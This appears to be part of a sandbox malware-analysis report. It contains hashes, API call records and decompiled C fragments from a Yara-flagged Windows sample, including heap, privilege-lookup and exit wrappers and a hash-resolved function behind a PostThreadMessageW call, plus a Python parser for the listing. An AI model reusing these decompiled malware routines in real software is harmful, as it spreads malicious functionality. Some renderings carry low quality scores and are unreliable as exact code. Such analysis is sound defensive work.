                                              • Opcode ID: d72a47be40b7aaf149c044fd95bc5e4c174f4e8df4b4948f1333c2827b5733b6
                                              • Instruction ID: b7637a93b9a1a1451a80c9c8bf8054f0f05f3389d4e7cde5ceeb83d929595390
                                              • Opcode Fuzzy Hash: d72a47be40b7aaf149c044fd95bc5e4c174f4e8df4b4948f1333c2827b5733b6
                                              • Instruction Fuzzy Hash: B590027131114802D2106159840471610069BD1341F52C421A1815559E86D58891B162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 94e0e0ede5ac6ffb0405bc8343093019de9562c0f6ce0fc2e53a18c307eb478d
                                              • Instruction ID: 8c86e518a7ddb8b5db8fb5d7a0efe172cde5176f73e413ffa383af29e32a87e3
                                              • Opcode Fuzzy Hash: 94e0e0ede5ac6ffb0405bc8343093019de9562c0f6ce0fc2e53a18c307eb478d
                                              • Instruction Fuzzy Hash: FE90026130100403D240715954186165006EBE1341F52D021E1405555DD9558856B262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 69855f26aee09ee303036d71ea4faa3890ceea257369e58085e530091ad9d1e4
                                              • Instruction ID: 31ea367c690b668709b195a88787ee15fab9a41c433464e7d60a5ec52fea3918
                                              • Opcode Fuzzy Hash: 69855f26aee09ee303036d71ea4faa3890ceea257369e58085e530091ad9d1e4
                                              • Instruction Fuzzy Hash: E390026921300402D2807159540861A10069BD1342F92D425A1006559DC9558869B361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9f9da8027f0b853cd37062ca905926b4c8087327664200e69209f191f7d65c1b
                                              • Instruction ID: 8e5b64fa19e6e17a6ba4d9724058b9e344b7d3caafb093bc1fde321bf00b7163
                                              • Opcode Fuzzy Hash: 9f9da8027f0b853cd37062ca905926b4c8087327664200e69209f191f7d65c1b
                                              • Instruction Fuzzy Hash: E890027120100802D2006599540865610069BE0341F52D021A6015556FC6A58891B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                              • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                              • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                              • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: %mA
                                              • API String ID: 3298025750-273627637
                                              • Opcode ID: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                              • Instruction ID: ff75906eec445189a7608ef16a07370f9ba81c6555a21011093ab971dc24f262
                                              • Opcode Fuzzy Hash: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                              • Instruction Fuzzy Hash: 56F0BEB82082856BEB00EF689CC08AB7794BF80318710895EFC4947243D634D95987A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 36%
                                              			// Heap-allocation wrapper. E004191F0 runs first with a per-wrapper constant (0x34 here; the
                                              			// LookupPrivilegeValueW and ExitProcess wrappers below pass 0x46 and 0x36), then RtlAllocateHeap
                                              			// is called with the caller's heap handle, flags and size (_a8, _a12, _a16), the last two pushed
                                              			// in reverse order by the decompiled prologue.
                                              			E004188C0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				void* _t10;
                                              				void* _t12;
                                              				void* _t15;
                                              
                                              				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                              				_t6 =  &_a8; // 0x413546
                                              				_t12 =  *_t6;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_t10 = RtlAllocateHeap(_t12); // executed
                                              				return _t10;
                                              			}

                                              Instruction addresses: 0x004188d7, 0x004188e2, 0x004188e2, 0x004188e8, 0x004188eb, 0x004188ed, 0x004188f1

                                              APIs
                                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: F5A
                                              • API String ID: 1279760036-683449296
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: F5A
                                              • API String ID: 1279760036-683449296
                                              • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction ID: 25b7ab50de32ca0460f32ce6d2cc7201fc87e64a3a46fad92a8330604ac2ee33
                                              • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction Fuzzy Hash: B6A022B3B20088000020B3F23C083EAE20C80C33BB2200CEFC00C30003888BC088322E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 74%
                                              			// Zeroes a 64-byte local buffer (_v68 plus the 0x3f bytes after it), passes it to E0041AD30 and
                                              			// E00409B50, and derives a function pointer (_t26) through E00413E60 with the constant 0xc4e7b6d6.
                                              			// If that pointer is non-null, WM_COMMAND (0x111) is posted to thread id _a8; the resolved
                                              			// function is called only when PostThreadMessageW fails.
                                              			E00407290(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                              				char _v67;
                                              				char _v68;
                                              				void* __esi;
                                              				void* _t12;
                                              				intOrPtr* _t13;
                                              				int _t14;
                                              				long _t22;
                                              				intOrPtr* _t26;
                                              				void* _t27;
                                              				void* _t31;
                                              
                                              				_t31 = __eflags;
                                              				// zero the 64-byte buffer starting at _v68
                                              				_v68 = 0;
                                              				E0041A150( &_v67, 0, 0x3f);
                                              				E0041AD30( &_v68, 3);
                                              				_t25 = _a4 + 0x1c;
                                              				_t12 = E00409B50(__ebx, __edi, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
                                              				_t13 = E00413E60(_t25, _t12, 0, 0, 0xc4e7b6d6);
                                              				_t26 = _t13;
                                              				if(_t26 != 0) {
                                              					_push(__edi);
                                              					_t22 = _a8;
                                              					// 0x111 == WM_COMMAND, posted to thread id _a8 with wParam = lParam = 0
                                              					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                              					_t33 = _t14;
                                              					if(_t14 == 0) {
                                              						// fallback when the post fails: call the pointer resolved above
                                              						_t14 =  *_t26(_t22, 0x8003, _t27 + (E004092B0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                              					}
                                              					return _t14;
                                              				}
                                              				return _t13;
                                              			}

                                              Instruction addresses: 0x00407290, 0x0040729f, 0x004072a3, 0x004072ae, 0x004072ba, 0x004072be, 0x004072ce, 0x004072d3, 0x004072da, 0x004072dc, 0x004072dd, 0x004072ea, 0x004072ec, 0x004072ee, 0x0040730b, 0x0040730b, 0x00000000, 0x0040730d, 0x00407312

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                              • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 30%
                                              			// Heap-free wrapper. The two leading stores are the decompiler's literal rendering of
                                              			// register-dependent instructions ahead of the call (quality 30%); the observable behaviour is
                                              			// E004191F0 followed by RtlFreeHeap(heap handle _a8, flags _a12, block _a16).
                                              			E00418900(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
                                              				char _t15;
                                              				void* _t22;
                                              
                                              				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
                                              				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
                                              				E004191F0(_t22);
                                              				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                              				return _t15;
                                              			}

                                              Instruction addresses: 0x00418905, 0x00418914, 0x00418917, 0x0041892d, 0x00418931

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			// LookupPrivilegeValueW wrapper: E004191F0 with constant 0x46, then the call with
                                              			// (system name _a8, privilege name _a12, LUID output _a16).
                                              			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                              				int _t10;
                                              				void* _t15;
                                              
                                              				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}

                                              Instruction addresses: 0x00418a7a, 0x00418a90, 0x00418a94

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			// ExitProcess wrapper: E004191F0 with constant 0x36, then ExitProcess(_a8); does not return.
                                              			E00418940(intOrPtr _a4, int _a8) {
                                              				void* _t10;
                                              
                                              				_t5 = _a4;
                                              				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                              				ExitProcess(_a8);
                                              			}

                                              Instruction addresses: 0x00418943, 0x0041895a, 0x00418968

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d69a568bd3c01bd6b1b8741695a98502ac883f7ddb1346542a67ed32ce26cf6c
                                              • Instruction ID: 1dc07bb8ff6b6698401254127e0ab06c4744a782e5ceb09ce967f87617a1cb2b
                                              • Opcode Fuzzy Hash: d69a568bd3c01bd6b1b8741695a98502ac883f7ddb1346542a67ed32ce26cf6c
                                              • Instruction Fuzzy Hash: 2BB09B71D054C5C5D711D761460872779017BD0751F17C062D2020641B4778C4D1F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Strings
                                              • <unknown>, xrefs: 0105B27E, 0105B2D1, 0105B350, 0105B399, 0105B417, 0105B48E
                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0105B39B
                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0105B323
                                              • *** enter .cxr %p for the context, xrefs: 0105B50D
                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0105B47D
                                              • Go determine why that thread has not released the critical section., xrefs: 0105B3C5
                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0105B2DC
                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0105B476
                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0105B2F3
                                              • The resource is owned shared by %d threads, xrefs: 0105B37E
                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0105B352
                                              • write to, xrefs: 0105B4A6
                                              • *** An Access Violation occurred in %ws:%s, xrefs: 0105B48F
                                              • This failed because of error %Ix., xrefs: 0105B446
                                              • *** then kb to get the faulting stack, xrefs: 0105B51C
                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0105B484
                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0105B38F
                                              • The critical section is owned by thread %p., xrefs: 0105B3B9
                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0105B53F
                                              • *** enter .exr %p for the exception record, xrefs: 0105B4F1
                                              • The instruction at %p referenced memory at %p., xrefs: 0105B432
                                              • *** Inpage error in %ws:%s, xrefs: 0105B418
                                              • an invalid address, %p, xrefs: 0105B4CF
                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0105B314
                                              • The instruction at %p tried to %s , xrefs: 0105B4B6
                                              • read from, xrefs: 0105B4AD, 0105B4B2
                                              • The resource is owned exclusively by thread %p, xrefs: 0105B374
                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0105B3D6
                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0105B305
                                              • a NULL pointer, xrefs: 0105B4E0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                              • API String ID: 0-108210295
                                              • Opcode ID: dfd14030b21049c11a3252874088599c26ad331f46af481621d3585f4fcf1b59
                                              • Instruction ID: 70dc9f0838b235415b18b231182e80a55936f45ab5f8c804b2561412aa22f7e6
                                              • Opcode Fuzzy Hash: dfd14030b21049c11a3252874088599c26ad331f46af481621d3585f4fcf1b59
                                              • Instruction Fuzzy Hash: 54811535A00200FFEF666A099C46EBB3F6AEF96B55F404084F9842B162D761E451EB73
                                              Uniqueness

                                              Uniqueness Score: -1.00%
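
                                              The "APIs", "Strings" and "Memory Dump Source" entries above repeat the same three line shapes for every function. The Python below, an added example that is not part of this report or of Joe Sandbox's tooling, turns those lines into a per-region call table so that calls made from the image at 0x00400000 can be separated from material in the image at 0x00F80000. The regular expressions, field names and the WM_COMMAND decoding are my own; the dotted fields of the .sdmp file name other than the base address are kept opaque because the report does not document them; the sample input is copied from the listings above.

```python
"""Parse the per-function "APIs", "Strings" and "Memory Dump Source" entries of a
Joe Sandbox function listing into a per-memory-region call table.

Added example; it is not part of the sandbox report or its tooling. Field names
are my own, and the dotted fields of the .sdmp file name other than the base
address are kept as opaque text because the report does not document them."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})$")
STR_RE = re.compile(r"^•\s*(.*?),\s*xrefs:\s*([0-9A-Fa-f]{8}(?:,\s*[0-9A-Fa-f]{8})*)$")
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(\d+)\.(\d+)\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp,"
    r"\s*Offset:\s*([0-9A-Fa-f]{8}),\s*based on PE:\s*(true|false)$"
)

WM_COMMAND = 0x111  # the message id in the PostThreadMessageW line of the listing


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                      # raw tokens; "?" means the sandbox could not recover the value
    ref: int                        # address of the call instruction
    notes: list = field(default_factory=list)


@dataclass
class Region:
    proc: int
    base: int
    is_pe: bool
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (text, [xref addresses])


def _annotate(call):
    """Decode a few argument values whose meaning is fixed by the Win32 API."""
    if call.name == "PostThreadMessageW" and len(call.args) > 1 and call.args[1] != "?":
        if int(call.args[1], 16) == WM_COMMAND:
            call.notes.append("msg=WM_COMMAND")
    elif call.name == "ExitProcess":
        call.notes.append("terminates process")
    return call


def parse_listing(text):
    """Return {base_address: Region}. API and string lines are attributed to the next
    'Source File' line, because in the listing each function's lines precede it."""
    regions, pending_calls, pending_strings = {}, [], []
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            name, module, argstr, ref = m.groups()
            args = [a.strip() for a in argstr.split(",")] if argstr else []
            pending_calls.append(_annotate(ApiCall(name, module, args, int(ref, 16))))
        elif m := SRC_RE.match(line):
            proc, _run, _seq, base, _f1, _f2, offset, is_pe = m.groups()
            if int(base, 16) != int(offset, 16):
                raise ValueError(f"file-name base {base} disagrees with Offset {offset}")
            reg = regions.setdefault(int(base, 16), Region(int(proc), int(base, 16), is_pe == "true"))
            reg.calls.extend(pending_calls)
            reg.strings.extend(pending_strings)
            pending_calls, pending_strings = [], []
        elif m := STR_RE.match(line):
            text_val, xrefs = m.groups()
            pending_strings.append((text_val, [int(x, 16) for x in re.split(r",\s*", xrefs)]))
    return regions


def summarize(regions):
    """One (base, module!api, call address, notes) row per call, ordered by region then address."""
    rows = []
    for base, reg in sorted(regions.items()):
        for c in sorted(reg.calls, key=lambda c: c.ref):
            rows.append((f"{base:08X}", f"{c.module}!{c.name}", f"{c.ref:08X}", ";".join(c.notes)))
    return rows


# Constructed input: lines copied from the listings, condensed so that the five API
# lines share one Source File line (in the report each function has its own).
SAMPLE_LISTING = """\
• RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
• RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
• LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
• Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• *** A stack buffer overrun occurred in %ws:%s, xrefs: 0105B2F3
• read from, xrefs: 0105B4AD, 0105B4B2
• Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
"""

if __name__ == "__main__":
    for row in summarize(parse_listing(SAMPLE_LISTING)):
        print(*row)
```

Feeding the script a whole report's function section gives one table per dump region; the rows for 0x00400000 are the calls the unpacked code makes, while a region that contributes only strings and no calls (here 0x00F80000) is immediately visible as such.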

                                              C-Code - Quality: 44%
                                              			// Heap-failure reporter. Reads the PEB (fs:[0x30]) -> Ldr (+0xc) -> first in-load-order entry
                                              			// (+0xc) -> BaseDllName (+0x2c) to print "HEAP[<image>]: ", then the faulting address and heap
                                              			// handle held in the globals 0x10958a0 and 0x109589c, and maps the failure code at 0x1095898
                                              			// (valid range 0..0xf) to a name through the jump table at 0x01061E96. The listing ends inside
                                              			// that switch.
                                              			E01061C06() {
                                              				signed int _t27;
                                              				char* _t104;
                                              				char* _t105;
                                              				intOrPtr _t113;
                                              				intOrPtr _t115;
                                              				intOrPtr _t117;
                                              				intOrPtr _t119;
                                              				intOrPtr _t120;
                                              
                                              				_t105 = 0xf848a4;
                                              				_t104 = "HEAP: ";
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E00FAB150();
                                              				} else {
                                              					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				_push( *0x109589c);
                                              				E00FAB150("Heap error detected at %p (heap handle %p)\n",  *0x10958a0);
                                              				_t27 =  *0x1095898; // 0x0
                                              				if(_t27 <= 0xf) {
                                              					switch( *((intOrPtr*)(_t27 * 4 +  &M01061E96))) {
                                              						case 0:
                                              							_t105 = "heap_failure_internal";
                                              							goto L21;
                                              						case 1:
                                              							goto L21;
                                              						case 2:
                                              							goto L21;
                                              						case 3:
                                              							goto L21;
                                              						case 4:
                                              							goto L21;
                                              						case 5:
                                              							goto L21;
                                              						case 6:
                                              							goto L21;
                                              						case 7:
                                              							goto L21;
                                              						case 8:
                                              							goto L21;
                                              						case 9:
                                              							goto L21;
                                              						case 0xa:
                                              							goto L21;
                                              						case 0xb:
                                              							goto L21;
                                              						case 0xc:
                                              							goto L21;
                                              						case 0xd:
                                              							goto L21;
                                              						case 0xe:
                                              							goto L21;
                                              						case 0xf:
                                              							goto L21;
                                              					}
                                              				}
                                              				L21:
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E00FAB150();
                                              				} else {
                                              					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				_push(_t105);
                                              				E00FAB150("Error code: %d - %s\n",  *0x1095898);
                                              				_t113 =  *0x10958a4; // 0x0
                                              				if(_t113 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E00FAB150();
                                              					} else {
                                              						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E00FAB150("Parameter1: %p\n",  *0x10958a4);
                                              				}
                                              				_t115 =  *0x10958a8; // 0x0
                                              				if(_t115 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E00FAB150();
                                              					} else {
                                              						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E00FAB150("Parameter2: %p\n",  *0x10958a8);
                                              				}
                                              				_t117 =  *0x10958ac; // 0x0
                                              				if(_t117 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E00FAB150();
                                              					} else {
                                              						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E00FAB150("Parameter3: %p\n",  *0x10958ac);
                                              				}
                                              				_t119 =  *0x10958b0; // 0x0
                                              				if(_t119 != 0) {
                                              					L41:
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E00FAB150();
                                              					} else {
                                              						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					_push( *0x10958b4);
                                              					E00FAB150("Last known valid blocks: before - %p, after - %p\n",  *0x10958b0);
                                              				} else {
                                              					_t120 =  *0x10958b4; // 0x0
                                              					if(_t120 != 0) {
                                              						goto L41;
                                              					}
                                              				}
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E00FAB150();
                                              				} else {
                                              					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				return E00FAB150("Stack trace available at %p\n", 0x10958c0);
                                              			}


                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
